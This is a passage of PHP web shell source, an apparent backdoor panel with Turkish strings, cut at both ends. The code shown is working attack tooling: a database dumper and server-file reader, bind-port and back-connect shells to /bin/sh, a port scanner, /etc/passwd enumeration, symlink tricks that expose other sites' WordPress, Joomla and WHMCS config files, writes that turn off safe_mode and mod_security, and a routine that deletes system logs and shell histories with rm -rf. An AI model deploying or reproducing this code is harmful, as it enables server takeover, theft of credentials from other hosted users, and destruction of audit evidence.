echo 'INSERT INTO `'.\$table.'` ('.implode(\", \", \$columns).') VALUES ('.implode(\", \", \$item).');\r\n'.\"\\n\";\r\n } break;\r\n case 'pgsql': \$this->query('SELECT * FROM '.\$table);\r\n while(\$item = \$this->fetch()) { \$columns = array();\r\n foreach(\$item as \$k=>\$v) { \$item[\$k] = \"'\".addslashes(\$v).\"'\";\r\n \$columns[] = \$k;\r\n } echo 'INSERT INTO '.\$table.' ('.implode(\", \", \$columns).') VALUES ('.implode(\", \", \$item).');\r\n'.\"\\n\";\r\n } break;\r\n } return false;\r\n } };\r\n \$db = new DbClass(@\$_POST['type']);\r\n if(@\$_POST['p2']=='download') { ob_start(\"ob_gzhandler\", 4096);\r\n \$db->connect(\$_POST['sql_host'], \$_POST['sql_login'], \$_POST['sql_pass'], \$_POST['sql_base']);\r\n \$db->selectdb(\$_POST['sql_base']);\r\n header(\"Content-Disposition: attachment;\r\n filename=dump.sql\");\r\n header(\"Content-Type: text/plain\");\r\n foreach(\$_POST['tbl'] as \$v) \$db->dump(\$v);\r\n exit;\r\n } printHeader();\r\n echo '<h1>Sql browser</h1><div class=content>\r\n <form name=\"sf\" method=\"post\">\r\n <table cellpadding=\"2\" cellspacing=\"0\">\r\n <tr>\r\n <td>Type</td>\r\n <td>Host</td>\r\n <td>Login</td>\r\n <td>Password</td>\r\n <td>Database</td>\r\n <td></td>\r\n </tr>\r\n <tr>\r\n <input type=hidden name=a value=Sql>\r\n <input type=hidden name=p1 value=\\'query\\'>\r\n <input type=hidden name=p2>\r\n <input type=hidden name=c value=\"'.htmlspecialchars(\$GLOBALS['cwd']).'\">\r\n <input type=hidden name=charset value=\"'.(isset(\$_POST['charset'])?\$_POST['charset']:'').'\">\r\n <td>\r\n <select name=\\'type\\'>\r\n <option value=\"mysql\" '.(@\$_POST['type']=='mysql'?'selected':'').'>MySql</option>\r\n <option value=\"pgsql\" '.(@\$_POST['type']=='pgsql'?'selected':'').'>PostgreSql</option>\r\n </select></td>\r\n <td><input type=text name=sql_host value=\"'.(empty(\$_POST['sql_host'])?'localhost':htmlspecialchars(\$_POST['sql_host'])).'\"></td>\r\n <td><input type=text name=sql_login value=\"'.(empty(\$_POST['sql_login'])?'root':htmlspecialchars(\$_POST['sql_login'])).'\"></td>\r\n <td><input type=text name=sql_pass value=\"'.(empty(\$_POST['sql_pass'])?'':htmlspecialchars(\$_POST['sql_pass'])).'\"></td>\r\n <td>';\r\n \$tmp = \"<input type=text name=sql_base value=''>\";\r\n if(isset(\$_POST['sql_host'])){ if(\$db->connect(\$_POST['sql_host'], \$_POST['sql_login'], \$_POST['sql_pass'], \$_POST['sql_base'])) { switch(\$_POST['charset']) { case \"Windows-1251\": \$db->setCharset('cp1251');\r\n break;\r\n case \"UTF-8\": \$db->setCharset('utf8');\r\n break;\r\n case \"KOI8-R\": \$db->setCharset('koi8r');\r\n break;\r\n case \"KOI8-U\": \$db->setCharset('koi8u');\r\n break;\r\n case \"cp866\": \$db->setCharset('cp866');\r\n break;\r\n } \$db->listDbs();\r\n echo \"<select name=sql_base><option value=''></option>\";\r\n while(\$item = \$db->fetch()) { list(\$key, \$value) = each(\$item);\r\n echo '<option value=\"'.\$value.'\" '.(\$value==\$_POST['sql_base']?'selected':'').'>'.\$value.'</option>';\r\n } echo '</select>';\r\n } else echo \$tmp;\r\n }else echo \$tmp;\r\n echo '</td>\r\n <td><input type=submit value=\">>\"></td>\r\n </tr>\r\n </table>\r\n <script>\r\n function st(t,l) {\r\n document.sf.p1.value = \\'select\\';\r\n\r\n document.sf.p2.value = t;\r\n\r\n if(l!=null)document.sf.p3.value = l;\r\n\r\n document.sf.submit();\r\n\r\n }\r\n function is() {\r\n for(i=0;\r\ni<document.sf.elements[\\'tbl[]\\'].length;\r\n++i)\r\n document.sf.elements[\\'tbl[]\\'][i].checked = !document.sf.elements[\\'tbl[]\\'][i].checked;\r\n\r\n }\r\n </script>';\r\n if(isset(\$db) && \$db->link){ echo \"<br/><table width=100% cellpadding=2 cellspacing=0>\";\r\n if(!empty(\$_POST['sql_base'])){ \$db->selectdb(\$_POST['sql_base']);\r\n echo \"<tr><td width=1 style='border-top:2px solid #666;\r\nborder-right:2px solid #666;\r\n'><span>Tables:</span><br><br>\";\r\n \$tbls_res = \$db->listTables();\r\n while(\$item = \$db->fetch(\$tbls_res)) { list(\$key, \$value) = each(\$item);\r\n \$n = \$db->fetch(\$db->query('SELECT COUNT(*) as n FROM '.\$value.''));\r\n \$value = htmlspecialchars(\$value);\r\n echo \"<nobr><input type='checkbox' name='tbl[]' value='\".\$value.\"'>&nbsp;\r\n<a href=# onclick=\\\"st('\".\$value.\"')\\\">\".\$value.\"</a> (\".\$n['n'].\")</nobr><br>\";\r\n } echo \"<input type='checkbox' onclick='is();\r\n'> <input type=button value='Dump' onclick='document.sf.p2.value=\\\"download\\\";\r\ndocument.sf.submit();\r\n'></td><td style='border-top:2px solid #666;\r\n'>\";\r\n if(@\$_POST['p1'] == 'select') { \$_POST['p1'] = 'query';\r\n \$db->query('SELECT COUNT(*) as n FROM '.\$_POST['p2'].'');\r\n \$num = \$db->fetch();\r\n \$num = \$num['n'];\r\n echo \"<span>\".\$_POST['p2'].\"</span> (\$num) \";\r\n for(\$i=0;\r\n\$i<(\$num/30);\r\n\$i++) if(\$i != (int)\$_POST['p3']) echo \"<a href='#' onclick='st(\\\"\".\$_POST['p2'].\"\\\", \$i)'>\",(\$i+1),\"</a> \";\r\n else echo (\$i+1),\" \";\r\n if(\$_POST['type']=='pgsql') \$_POST['p3'] = 'SELECT * FROM '.\$_POST['p2'].' LIMIT 30 OFFSET '.(\$_POST['p3']*30);\r\n else \$_POST['p3'] = 'SELECT * FROM `'.\$_POST['p2'].'` LIMIT '.(\$_POST['p3']*30).',30';\r\n echo \"<br><br>\";\r\n } if((@\$_POST['p1'] == 'query') && !empty(\$_POST['p3'])) { \$db->query(@\$_POST['p3']);\r\n if(\$db->res !== false) { \$title = false;\r\n echo '<table width=100% cellspacing=0 cellpadding=2 class=main>';\r\n \$line = 1;\r\n while(\$item = \$db->fetch()) { if(!\$title) { echo '<tr>';\r\n foreach(\$item as \$key => \$value) echo '<th>'.\$key.'</th>';\r\n reset(\$item);\r\n \$title=true;\r\n echo '</tr><tr>';\r\n \$line = 2;\r\n } echo '<tr class=\"l'.\$line.'\">';\r\n \$line = \$line==1?2:1;\r\n foreach(\$item as \$key => \$value) { if(\$value == null) echo '<td><i>null</i></td>';\r\n else echo '<td>'.nl2br(htmlspecialchars(\$value)).'</td>';\r\n } echo '</tr>';\r\n } echo '</table>';\r\n } else { echo '<div><b>Error:</b> '.htmlspecialchars(\$db->error()).'</div>';\r\n } } echo \"<br><textarea name='p3' style='width:100%;\r\nheight:100px'>\".@htmlspecialchars(\$_POST['p3']).\"</textarea><br/><input type=submit value='Execute'>\";\r\n echo \"</td></tr>\";\r\n } echo \"</table></form><br/><form onsubmit='document.sf.p1.value=\\\"loadfile\\\";\r\ndocument.sf.p2.value=this.f.value;\r\ndocument.sf.submit();\r\nreturn false;\r\n'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>\";\r\n if(@\$_POST['p1'] == 'loadfile') { \$db->query(\"SELECT LOAD_FILE('\".addslashes(\$_POST['p2']).\"') as file\");\r\n \$file = \$db->fetch();\r\n echo '<pre class=ml1>'.htmlspecialchars(\$file['file']).'</pre>';\r\n } } echo '</div>';\r\n printFooter();\r\n } function actionNetwork() { printHeader();\r\n \$back_connect_c=\"\";\r\n \$back_connect_p=\"\";\r\n \$bind_port_c=\"\";\r\n \$bind_port_p=\"\";\r\n echo '<h1>Network tools</h1><div class=content>\r\n <form name=\\'nfp\\' onSubmit=\"g(null,null,this.using.value,this.port.value,this.pass.value);\r\nreturn false;\r\n\">\r\n <br /><span>Bind port to /bin/sh</span><br/>\r\n Port: <input type=\\'text\\' name=\\'port\\' value=\\'443\\'> Password: <input type=\\'text\\' name=\\'pass\\' value=\\'smurf\\'> Using: <select name=\"using\"><option value=\\'bpc\\'>C</option><option value=\\'bpp\\'>Perl</option></select> <input type=submit value=\">>\">\r\n </form>\r\n <form name=\\'nfp\\' onSubmit=\"g(null,null,this.using.value,this.server.value,this.port.value);\r\nreturn false;\r\n\">\r\n <br /><br /><span>Back-connect to</span><br/>\r\n Server: <input type=\\'text\\' name=\\'server\\' value=\"'.\$_SERVER['REMOTE_ADDR'].'\"> Port: <input type=\\'text\\' name=\\'port\\' value=\\'443\\'> Using: <select name=\"using\"><option value=\\'bcc\\'>C</option><option value=\\'bcp\\'>Perl</option></select> <input type=submit value=\">>\">\r\n </form><br>';\r\n if(isset(\$_POST['p1'])) { function cf(\$f,\$t) { \$w=@fopen(\$f,\"w\") or @function_exists('file_put_contents');\r\n if(\$w) { @fwrite(\$w,@base64_decode(\$t)) or @fputs(\$w,@base64_decode(\$t)) or @file_put_contents(\$f,@base64_decode(\$t));\r\n @fclose(\$w);\r\n } } if(\$_POST['p1'] == 'bpc') { cf(\"/tmp/bp.c\",\$bind_port_c);\r\n \$out = ex(\"gcc -o /tmp/bp /tmp/bp.c\");\r\n @unlink(\"/tmp/bp.c\");\r\n \$out .= ex(\"/tmp/bp \".\$_POST['p2'].\" \".\$_POST['p3'].\" &\");\r\n echo \"<pre class=ml1>\$out\\n\".ex(\"ps aux | grep bp\").\"</pre>\";\r\n } if(\$_POST['p1'] == 'bpp') { cf(\"/tmp/bp.pl\",\$bind_port_p);\r\n \$out = ex(which(\"perl\").\" /tmp/bp.pl \".\$_POST['p2'].\" &\");\r\n echo \"<pre class=ml1>\$out\\n\".ex(\"ps aux | grep bp.pl\").\"</pre>\";\r\n } if(\$_POST['p1'] == 'bcc') { cf(\"/tmp/bc.c\",\$back_connect_c);\r\n \$out = ex(\"gcc -o /tmp/bc /tmp/bc.c\");\r\n @unlink(\"/tmp/bc.c\");\r\n \$out .= ex(\"/tmp/bc \".\$_POST['p2'].\" \".\$_POST['p3'].\" &\");\r\n echo \"<pre class=ml1>\$out\\n\".ex(\"ps aux | grep bc\").\"</pre>\";\r\n } if(\$_POST['p1'] == 'bcp') { cf(\"/tmp/bc.pl\",\$back_connect_p);\r\n \$out = ex(which(\"perl\").\" /tmp/bc.pl \".\$_POST['p2'].\" \".\$_POST['p3'].\" &\");\r\n echo \"<pre class=ml1>\$out\\n\".ex(\"ps aux | grep bc.pl\").\"</pre>\";\r\n } } echo '</div>';\r\n printFooter();\r\n } function actionPortScanner() { printHeader();\r\n echo '<h1>Port Scanner</h1>';\r\n echo '<div class=\"content\">';\r\n echo '<form action=\"\" method=\"post\">';\r\n if(isset(\$_POST['host']) && is_numeric(\$_POST['end']) && is_numeric(\$_POST['start'])){ \$start = strip_tags(\$_POST['start']);\r\n \$end = strip_tags(\$_POST['end']);\r\n \$host = strip_tags(\$_POST['host']);\r\n for(\$i = \$start;\r\n \$i<=\$end;\r\n \$i++){ \$fp = @fsockopen(\$host, \$i, \$errno, \$errstr, 3);\r\n if(\$fp){ echo 'Port '.\$i.' is <font color=green>open</font><br>';\r\n } flush();\r\n } } else { echo '<br /><br /><center><input type=\"hidden\" name=\"a\" value=\"PortScanner\"><input type=\"hidden\" name=p1><input type=\"hidden\" name=\"p2\">\r\n <input type=\"hidden\" name=\"c\" value=\"'.htmlspecialchars(\$GLOBALS['cwd']).'\">\r\n <input type=\"hidden\" name=\"charset\" value=\"'.(isset(\$_POST['charset'])?\$_POST['charset']:'').'\">\r\n Host: <input type=\"text\" name=\"host\" value=\"localhost\"/><br /><br />\r\n Port start: <input type=\"text\" name=\"start\" value=\"0\"/><br /><br />\r\n Port end:<input type=\"text\" name=\"end\" value=\"5000\"/><br /><br />\r\n <input type=\"submit\" value=\"Scan Ports\" />\r\n </form></center><br /><br />';\r\n } echo '</div>';\r\n printFooter();\r\n } function actionReadable() { printHeader();\r\n echo '<h1>Readable Dirs</h1>';\r\n echo '<div class=\"content\">';\r\n \$sm = ini_get('safe_mode');\r\n if(\$sm) { echo '<br /><b>Error: safe_mode = on</b><br /><br />';\r\n } else { @\$passwd = fopen('/etc/passwd','r');\r\n if (!\$passwd) { echo '<br /><b>[-] Error : coudn`t read /etc/passwd</b><br /><br />';\r\n } else { \$pub = array();\r\n \$users = array();\r\n \$conf = array();\r\n \$i = 0;\r\n while(!feof(\$passwd)) { \$str = fgets(\$passwd);\r\n if (\$i > 35) { \$pos = strpos(\$str,':');\r\n \$username = substr(\$str,0,\$pos);\r\n \$dirz = '/home/'.\$username.'/public_html/';\r\n if ((\$username != '')) { if (is_readable(\$dirz)) { array_push(\$users,\$username);\r\n array_push(\$pub,\$dirz);\r\n } } } \$i++;\r\n } echo '<br><br>';\r\n echo \"[+] Founded \".sizeof(\$users).\" entrys in /etc/passwd\\n\".\"<br />\";\r\n echo \"[+] Founded \".sizeof(\$pub).\" readable public_html directories\\n\".\"<br /><br /><br />\";\r\n foreach (\$users as \$user) { \$path = \"/home/\$user/public_html/\";\r\n echo \$path.\"<br>\";\r\n } echo \"<br /><br /><br />[+] Complete...\\n\".\"<br />\";\r\n } } echo '</div>';\r\n printFooter();\r\n } function actionSymlink() { printHeader();\r\n echo '<h1>Symlink</h1>';\r\n \$furl = 'http://'.\$_SERVER['SERVER_NAME'].\$_SERVER['REQUEST_URI'];\r\n \$expld = explode('/',\$furl );\r\n \$burl =str_replace(end(\$expld),'',\$furl);\r\n echo '<div class=\"content\"><center>\r\n <h3>[ <a href=\"#\" onclick=\"g(\\'symlink\\',null,\\'website\\',null)\">Domains</a> ] - \r\n [ <a href=\"#\" onclick=\"g(\\'symlink\\',null,\\'whole\\',null)\">Whole Server Symlink</a> ] - \r\n [ <a href=\"#\" onclick=\"g(\\'symlink\\',null,\\'config\\',null)\">Config files symlink</a> ]</h3></center>';\r\n if(isset(\$_POST['p1']) && \$_POST['p1']=='website') { echo \"<center>\";\r\n \$d0mains = @file(\"/etc/named.conf\");\r\n if(!\$d0mains){ echo \"<pre class=ml1 style='margin-top:5px'>Cant access this file on server -> [ /etc/named.conf ]</pre></center>\";\r\n } else { echo \"<table align=center class='main' border=0 ><tr><th> Count </th><th> Domains </th><th> Users </th></tr>\";\r\n \$unk = array();\r\n foreach(\$d0mains as \$d0main){ if(@eregi(\"zone\",\$d0main)){ preg_match_all('#zone \"(.*)\"#', \$d0main, \$domains);\r\n flush();\r\n if(strlen(trim(\$domains[1][0])) > 2){ \$unk[] = \$domains[1][0];\r\n flush();\r\n } } } \$count=1;\r\n \$unk = array_unique(\$unk);\r\n \$l=0;\r\n foreach(\$unk as \$d){ \$user = posix_getpwuid(@fileowner(\"/etc/valiases/\".\$d));\r\n echo \"<tr\".(\$l?' class=l1':'').\"><td>\".\$count.\"</td><td><a href=http://\".\$d.\"/>\".\$d.\"</a></td><td>\".\$user['name'].\"</td></tr>\";\r\n flush();\r\n \$count++;\r\n \$l=\$l?0:1;\r\n } echo \"</table>\";\r\n } echo \"</center>\";\r\n } if(isset(\$_POST['p1']) && \$_POST['p1']=='whole') { echo \"<center>\";\r\n @mkdir('sym',0777);\r\n \$hdt = \"Options all \\n DirectoryIndex Sux.html \\n AddType text/plain .php \\n AddHandler server-parsed .php \\n AddType text/plain .html \\n AddHandler txt .html \\n Require None \\n Satisfy Any\";\r\n \$hfp =@fopen ('sym/.htaccess','w');\r\n fwrite(\$hfp ,\$hdt);\r\n if(function_exists('symlink')) { @symlink('/','sym/root');\r\n } \$d0mains = @file('/etc/named.conf');\r\n if(!\$d0mains) { echo \"<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>\";\r\n } else { echo \"<table align='center' width='40%' class='main'><tr><th> Count </th><th> Domains </th><th> User </th><th> Symlink </th></tr>\";\r\n \$count=1;\r\n \$mck = array();\r\n foreach(\$d0mains as \$d0main){ if(@eregi('zone',\$d0main)){ preg_match_all('#zone \"(.*)\"#',\$d0main,\$domain);\r\n flush();\r\n if(strlen(trim(\$domain[1][0])) >2){ \$mck[] = \$domain[1][0];\r\n } } } \$mck = array_unique(\$mck);\r\n \$l=0;\r\n foreach(\$mck as \$d) { \$user = posix_getpwuid(@fileowner('/etc/valiases/'.\$d));\r\n \$ddt = \$user['name'];\r\n \$ddt = \$d;\r\n if(@eregi(\"\\.ir\",\$d) or @eregi(\"\\.il\",\$d)) { \$ddt = \"<div style=' color: #FF0000 ;\r\n text-shadow: 0px 0px 1px red;\r\n '>\".\$d.'</div>';\r\n } echo \"<tr\".(\$l?' class=l1':'').\"><td>\".\$count++.\"</td><td><a target='_blank' href=http://\".\$d.'/>'.\$ddt.' </a></td><td>'.\$user['name'].\"</td><td><a href='sym/root/home/\".\$user['name'].\"/public_html' target='_blank'>symlink </a></td></tr>\";\r\n flush();\r\n \$l=\$l?0:1;\r\n } echo '</table>';\r\n } echo \"</center>\";\r\n } if(isset(\$_POST['p1']) && \$_POST['p1']=='config') { echo \"<center>\";\r\n @mkdir('sym',0777);\r\n \$hdt = \"Options all \\n DirectoryIndex Sux.html \\n AddType text/plain .php \\n AddHandler server-parsed .php \\n AddType text/plain .html \\n AddHandler txt .html \\n Require None \\n Satisfy Any\";\r\n \$hfp = @fopen ('sym/.htaccess','w');\r\n @fwrite(\$hfp ,\$hdt);\r\n if(function_exists('symlink')) { @symlink('/','sym/root');\r\n } \$d0mains = @file('/etc/named.conf');\r\n if(!\$d0mains) { echo \"<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>\";\r\n } else { echo \"<table align='center' width='40%' class='main' ><tr><th> Count </th><th> Domains </th><th> Script </th></tr>\";\r\n \$count = 1;\r\n \$l=0;\r\n foreach(\$d0mains as \$d0main){ if(@eregi('zone',\$d0main)){ preg_match_all('#zone \"(.*)\"#',\$d0main,\$domain);\r\n flush();\r\n if(strlen(trim(\$domain[1][0]))>2){ \$user = posix_getpwuid(@fileowner('/etc/valiases/'.\$domain[1][0]));\r\n \$c1 = \$burl.'/sym/root/home/'.\$user['name'].'/public_html/wp-config.php';\r\n \$ch01 = get_headers(\$c1);\r\n \$cf01 = \$ch01[0];\r\n \$c2 = \$burl.'/sym/root/home/'.\$user['name'].'/public_html/blog/wp-config.php';\r\n \$ch02 = get_headers(\$c2);\r\n \$cf02 = \$ch02[0];\r\n \$c3 = \$burl.'/sym/root/home/'.\$user['name'].'/public_html/configuration.php';\r\n \$ch03 = get_headers(\$c3);\r\n \$cf03 = \$ch03[0];\r\n \$c4 = \$burl.'/sym/root/home/'.\$user['name'].'/public_html/joomla/configuration.php';\r\n \$ch04 = get_headers(\$c4);\r\n \$cf04 = \$ch04[0];\r\n \$c5 = \$burl.'/sym/root/home/'.\$user['name'].'/public_html/includes/config.php';\r\n \$ch05 = get_headers(\$c5);\r\n \$cf05 = \$ch05[0];\r\n \$c6 = \$burl.'/sym/root/home/'.\$user['name'].'/public_html/vb/includes/config.php';\r\n \$ch06 = get_headers(\$c6);\r\n \$cf06 = \$ch06[0];\r\n \$c7 = \$burl.'/sym/root/home/'.\$user['name'].'/public_html/forum/includes/config.php';\r\n \$ch07 = get_headers(\$c7);\r\n \$cf07 = \$ch07[0];\r\n \$c8 = \$burl.'/sym/root/home/'.\$user['name'].'public_html/clients/configuration.php';\r\n \$ch08 = get_headers(\$c8);\r\n \$cf08 = \$ch08[0];\r\n \$c9 = \$burl.'/sym/root/home/'.\$user['name'].'/public_html/support/configuration.php';\r\n \$ch09 = get_headers(\$c9);\r\n \$cf09 = \$ch09[0];\r\n \$c10 = \$burl.'/sym/root/home/'.\$user['name'].'/public_html/client/configuration.php';\r\n \$ch10 = get_headers(\$c10);\r\n \$cf10 = \$ch10[0];\r\n \$c11 = \$burl.'/sym/root/home/'.\$user['name'].'/public_html/submitticket.php';\r\n \$ch11 = get_headers(\$c11);\r\n \$cf11 = \$ch11[0];\r\n \$c12 = \$burl.'/sym/root/home/'.\$user['name'].'/public_html/client/configuration.php';\r\n \$ch12 = get_headers(\$c12);\r\n \$cf12 = \$ch12[0];\r\n \$c13 = \$burl.'/sym/root/home/'.\$user['name'].'/public_html/includes/configure.php';\r\n \$ch13 = get_headers(\$c13);\r\n \$cf13 = \$ch13[0];\r\n \$c14 = \$burl.'/sym/root/home/'.\$user['name'].'/public_html/include/app_config.php';\r\n \$ch14 = get_headers(\$c14);\r\n \$cf14 = \$ch14[0];\r\n \$c15 = \$burl.'/sym/root/home/'.\$user['name'].'/public_html/sites/default/settings.php';\r\n \$ch15 = get_headers(\$c15);\r\n \$cf15 = \$ch15[0];\r\n \$out = '&nbsp;\r\n';\r\n if(strpos(\$cf01,'200') == true) { \$out = \"<a href='\".\$c1.\"' target='_blank'>Wordpress</a>\";\r\n } elseif(strpos(\$cf02,'200') == true) { \$out = \"<a href='\".\$c2.\"' target='_blank'>Wordpress</a>\";\r\n } elseif(strpos(\$cf03,'200') == true && strpos(\$cf11,'200') == true) { \$out = \" <a href='\".\$c11.\"' target='_blank'>WHMCS</a>\";\r\n } elseif(strpos(\$cf09,'200') == true) { \$out = \" <a href='\".\$c9.\"' target='_blank'>WHMCS</a>\";\r\n } elseif(strpos(\$cf10,'200') == true) { \$out = \" <a href='\".\$c10.\"' target='_blank'>WHMCS</a>\";\r\n } elseif(strpos(\$cf03,'200') == true) { \$out = \" <a href='\".\$c3.\"' target='_blank'>Joomla</a>\";\r\n } elseif(strpos(\$cf04,'200') == true) { \$out = \" <a href='\".\$c4.\"' target='_blank'>Joomla</a>\";\r\n } elseif(strpos(\$cf05,'200') == true) { \$out = \" <a href='\".\$c5.\"' target='_blank'>vBulletin</a>\";\r\n } elseif(strpos(\$cf06,'200') == true) { \$out = \" <a href='\".\$c6.\"' target='_blank'>vBulletin</a>\";\r\n } elseif(strpos(\$cf07,'200') == true) { \$out = \" <a href='\".\$c7.\"' target='_blank'>vBulletin</a>\";\r\n } elseif(strpos(\$cf08,'200') == true) { \$out = \" <a href='\".\$c7.\"' target='_blank'>Client Area</a>\";\r\n } elseif(strpos(\$cf12,'200') == true) { \$out = \" <a href='\".\$c7.\"' target='_blank'>Client Area</a>\";\r\n } elseif(strpos(\$cf13,'200') == true) { \$out = \" <a href='\".\$c7.\"' target='_blank'>osCommerce/Zen Cart</a>\";\r\n } elseif(strpos(\$cf14,'200') == true) { \$out = \" <a href='\".\$c7.\"' target='_blank'>Magento</a>\";\r\n } elseif(strpos(\$cf15,'200') == true) { \$out = \" <a href='\".\$c7.\"' target='_blank'>Drupal</a>\";\r\n } else { continue;\r\n } echo '<tr'.(\$l?' class=l1':'').'><td>'.\$count++.'</td><td><a href=http://www.'.\$domain[1][0].'/>'.\$domain[1][0].'</a></td><td>'.\$user['name'].'</td><td>'.\$out.'</td></tr>';\r\n flush();\r\n \$l=\$l?0:1;\r\n } } } echo \"</table>\";\r\n } echo \"</center>\";\r\n } echo \"</div>\";\r\n printFooter();\r\n } function actionSafeMode() { printHeader();\r\n echo '<h1>Safe Mode</h1>';\r\n echo '<div class=\"content\">';\r\n echo \"<div class=header><center><h3><span>| SAFE MODE AND MOD SECURITY DISABLED AND PERL 500 INTERNAL ERROR BYPASS |</span></h3>Following php.ini and .htaccess(mod) and perl(.htaccess)[convert perl extention *.pl => *.sh ] files create in following dir<br>| \".\$GLOBALS['cwd'].\" |<br><br />\";\r\n echo '<a href=# onclick=\"g(null,null,\\'php.ini\\',null)\">| PHP.INI | </a><a href=# onclick=\"g(null,null,null,\\'ini\\')\">| .htaccess(Mod) | </a><a href=# onclick=\"g(null,null,null,null,\\'sh\\')\">| .htaccess(perl) | </a></center>';\r\n if(!empty(\$_POST['p2']) && isset(\$_POST['p2'])) { \$fil=fopen(\$GLOBALS['cwd'].\".htaccess\",\"w\");\r\n fwrite(\$fil,'<IfModule mod_security.c>\r\n Sec------Engine Off\r\n Sec------ScanPOST Off\r\n </IfModule>');\r\n fclose(\$fil);\r\n } if(!empty(\$_POST['p1'])&& isset(\$_POST['p1'])) { \$fil=fopen(\$GLOBALS['cwd'].\"php.ini\",\"w\");\r\n fwrite(\$fil,'safe_mode=OFF\r\n disable_functions=NONE');\r\n fclose(\$fil);\r\n } if(!empty(\$_POST['p3']) && isset(\$_POST['p3'])) { \$fil=fopen(\$GLOBALS['cwd'].\".htaccess\",\"w\");\r\n fwrite(\$fil,'Options FollowSymLinks MultiViews Indexes ExecCGI\r\n AddType application/x-httpd-cgi .sh\r\n AddHandler cgi-script .pl\r\n AddHandler cgi-script .pl');\r\n fclose(\$fil);\r\n } echo \"<br><br /><br /></div>\";\r\n echo '</div>';\r\n printFooter();\r\n} function actionSQLBUDDY(){ printHeader();\r\n if(!file_exists('yazilimlar/sqlbuddy/index.php')){ \$dizin = 'https://byr00t.co/vb/sqlbuddy.zip';\r\n function dosya_indir(\$link,\$name=null) { \$link_info = pathinfo(\$link);\r\n \$uzanti = strtolower(\$link_info['extension']);\r\n \$file = (\$name) ? \$name.'.'.\$uzanti : \$link_info['basename'];\r\n \$curl = curl_init(\$link);\r\n \$fopen = fopen(\$file,'w');\r\n curl_setopt(\$curl, CURLOPT_HEADER,0);\r\n curl_setopt(\$curl, CURLOPT_RETURNTRANSFER,1);\r\n curl_setopt(\$curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);\r\n curl_setopt(\$curl, CURLOPT_FILE, \$fopen);\r\n curl_exec(\$curl);\r\n curl_close(\$curl);\r\n fclose(\$fopen);\r\n } dosya_indir(\$dizin, \"sqlbuddy\");\r\n \$zip = new ZipArchive();\r\n \$file = 'sqlbuddy.zip';\r\n \$zip->open(\$file);\r\n \$cikar = \$zip->extractTo('yazilimlar/');\r\n if(file_exists('sqlbuddy.zip')){ @unlink('sqlbuddy.zip');\r\n } if(\$cikar){ echo \"<iframe src=yazilimlar/sqlbuddy/index.php width=100% height=100% frameborder=0></iframe> \";\r\n } else{ echo '<div class=\"alert alert-danger\"><strong>Hata!</strong> Dosya indirilirken kritik bir hata olu\xc3\x85\xc5\xb8tu.</div>';\r\n } } elseif(file_exists('yazilimlar/sqlbuddy/index.php')){ echo \"<iframe src=yazilimlar/sqlbuddy/index.php width=100% height=100% frameborder=0></iframe> \";\r\n } printFooter();\r\n } function actionDeleteLOG(){ printHeader();\r\n echo '<h1>Delete Logs</h1>';\r\n function cmdExe(\$in) { \$out = '';\r\n if (function_exists('passthru')) { ob_start();\r\n @passthru(\$in);\r\n \$out = ob_get_clean();\r\n } else if (function_exists('exec')) { @exec(\$in,\$out);\r\n \$out = @join(\"\\n\",\$out);\r\n } elseif (function_exists('system')) { ob_start();\r\n @system(\$in);\r\n \$out = ob_get_clean();\r\n } elseif (function_exists('shell_exec')) { \$out = shell_exec(\$in);\r\n } elseif (is_resource(\$f = @popen(\$in,\"r\"))) { \$out = \"\";\r\n while(!@feof(\$f)) \$out .= fread(\$f,1024);\r\n pclose(\$f);\r\n } return \$out;\r\n } cmdExe(\"rm -rf /tmp/logs\");\r\n cmdExe(\"rm -rf /root/.ksh_history\");\r\n cmdExe(\"rm -rf /root/.bash_history\");\r\n cmdExe(\"rm -rf /root/.bash_logout\");\r\n cmdExe(\"rm -rf /usr/local/apache/logs\");\r\n cmdExe(\"rm -rf /usr/local/apache/log\");\r\n cmdExe(\"rm -rf /var/apache/logs\");\r\n cmdExe(\"rm -rf /var/apache/log\");\r\n cmdExe(\"rm -rf /var/run/utmp\");\r\n cmdExe(\"rm -rf /var/logs\");\r\n cmdExe(\"rm -rf /var/log\");\r\n cmdExe(\"rm -rf /var/adm\");\r\n cmdExe(\"rm -rf /etc/wtmp\");\r\n cmdExe(\"rm -rf /etc/utmp\");\r\n cmdExe(\"rm -rf \$HISTFILE\");\r\n cmdExe(\"rm -rf /var/log/lastlog\");\r\n cmdExe(\"rm -rf /var/log/wtmp\");\r\n echo '<div style=\"padding:5px;\r\n\">\r\n [<font class=\"d\">OK</font>] <font class=\"c\">Delete:</font> /tmp/logs <br>\r\n [<font class=\"d\">OK</font>] <font class=\"c\">Delete:</font> /root/.ksh_history <br>\r\n [<font class=\"d\">OK</font>] <font class=\"c\">Delete:</font> /root/.bash_history <br>\r\n [<font class=\"d\">OK</font>] <font class=\"c\">Delete:</font> /usr/local/apache/logs <br>\r\n [<font class=\"d\">OK</font>] <font class=\"c\">Delete:</font> /usr/local/apache/log <br>\r\n [<font class=\"d\">OK</font>] <font class=\"c\">Delete:</font> /var/apache/logs <br>\r\n [<font class=\"d\">OK</font>] <font class=\"c\">Delete:</font> /var/apache/log <br>\r\n [<font class=\"d\">OK</font>] <font class=\"c\">Delete:</font> /var/run/utmp <br>\r\n [<font class=\"d\">OK</font>] <font class=\"c\">Delete:</font> /var/adm <br>\r\n [<font class=\"d\">OK</font>] <font class=\"c\">Delete:</font> /etc/wtmp <br>\r\n [<font class=\"d\">OK</font>] <font class=\"c\">Delete:</font> \$HISTFILE<br>\r\n [<font class=\"d\">OK</font>] <font class=\"c\">Delete:</font> /var/log/lastlog <br>\r\n [<font class=\"d\">OK</font>] <font class=\"c\">Delete:</font> /var/log/wtmp <br>\r\n </div>';\r\n printFooter();\r\n } function actionPython(){ printHeader();\r\n if(!is_dir('python')){ mkdir('python', 0755);\r\n } chdir('python');\r\n\$kokdosya = \".htaccess\";\r\n \$dosya_adi = \"\$kokdosya\";\r\n \$dosya = fopen (\$dosya_adi , 'w') or die (\"Dosya a&#231;\r\n&#305;\r\nlamad&#305;\r\n!\");\r\n \$metin = \"AddHandler cgi-script .r00t\";\r\n fwrite ( \$dosya , \$metin ) ;\r\n fclose (\$dosya);\r\n \$pythonp = 